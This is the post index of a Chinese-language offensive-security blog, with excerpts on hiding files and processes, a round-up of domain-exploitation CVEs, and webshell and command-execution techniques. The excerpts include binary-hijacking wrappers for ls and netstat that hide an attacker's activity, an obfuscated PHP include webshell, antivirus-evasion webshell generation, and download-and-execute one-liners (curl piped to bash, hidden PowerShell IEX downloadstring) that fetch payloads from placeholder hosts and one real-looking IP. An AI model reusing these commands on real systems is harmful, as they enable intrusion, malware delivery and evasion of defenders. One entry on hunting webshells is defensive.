文件隐藏技巧 linuxlinux中隐藏文件的方式是创建以.开头的文件名,但是由于shell中ls只要加入-a参数就可查看隐藏文件,一般加点并起不到什么作用,这里分享几种迷惑性的隐藏思路 创建…目录由于每个目录都存在.和..两个目录 其默认不使用-a参数也不会显示 使用-a时会与.与..共同出现,有时会被人为忽略 更改ls修改ls程序屏蔽掉特定的字符串显示 正常情况: 创建/usr/local/bin/ls 2022-01-21 防御规避 防御规避
域渗透历史漏洞汇总 MS14-068(CVE-2014-6324)Kerberos 校验和漏洞 https://nvd.nist.gov/vuln/detail/CVE-2014-6324 EXP/POC: https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068 CVE-2020-1472Netlogon特权提升漏洞 https://nvd. 2022-01-20 域渗透 域渗透
linux进程隐匿 netstat 伪装先寻找netstat路径 whereis netstatwhich netstat 得到 /usr/bin/netstat 创建/usr/local/bin/netstat 写入 12# !/bin/bash/usr/bin/netstat $@ | grep -Ev 'name|name|name' 含有引号中每个|分割符中的选项都会被屏蔽 可以是进程名 2022-01-06 防御规避 防御规避
webshell溯源排查与反制 前言溯源排查中比较重要的一环是web突破口排查,攻击者通过web突破口入侵时,有极大的概率会写入webshell,本文介绍下常见的webshell排查方法和流程。 工具查杀使用d盾、安全狗、护卫神等webshell查杀工具查杀web目录 d盾:http://www.d99net.net/ 网站安全狗:https://www.safedog.cn/website_safedog.html 百度web 2022-01-01 webshell webshell 溯源排查
include方式webshell 写文件include1234//来源于网络<?php(~urldecode("%99%96%93%9A%A0%8F%8A%8B%A0%9C%90%91%8B%9A%91%8B%8C"))('temp.php','<?php '.$_POST[a].' ?>');include('temp.p 2021-12-21 webshell webshell
webshell流量编码免杀 流量特征去除——请求webshell流量特征去除主要靠对传入特征进行编码与加密,蚁剑自带编码器功能,需要用js编写,可以参考github中给出的几种编码器 https://github.com/AntSwordProject/AwesomeEncoder 由于某些waf会对流量中base64等数据进行解码后判断,所以最好使用混合方式规避检测。 base64编码器123456789101112131 2021-10-10 webshell webshell
免杀webshell批量生成工具 php123456789101112131415161718192021222324252627282930313233343536373839404142434445464748import randomshell='''<?phpfunction {1}(){{ $_1={0}; return $_ 2021-10-10 webshell webshell
windows命令执行上传恶意文件总结 wget1wget http://xx.xx.xx.xx:8080/shell.txt -O x.php powershell命令执行权限时 12powershell -Command "$client = new-object System.Net.WebClient;$client.DownloadFile('http://144.34.191.182:8000/1.e 2021-09-02 命令执行 命令执行
linux命令执行上传恶意文件总结 curl写文件 1curl -fsSL http://xx.xx.xx.xx:8080/test.txt > 1.php 无文件执行命令 1curl -fsSL http://xx.xx.xx.xx:8080/test.sh | bash wget1wget http://xx.xx.xx.xx:8080/shell.txt -O /tmp/x.php rcp1rcp root@x.x.x 2021-09-02 命令执行 命令执行
windows命令执行防御规避总结 powershell1powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://xx.xx.xx.xx:8888/logo.gif'))\"" /f SIP通过sip劫持对恶意代码签名获得系统信任https://github 2021-08-15 命令执行 命令执行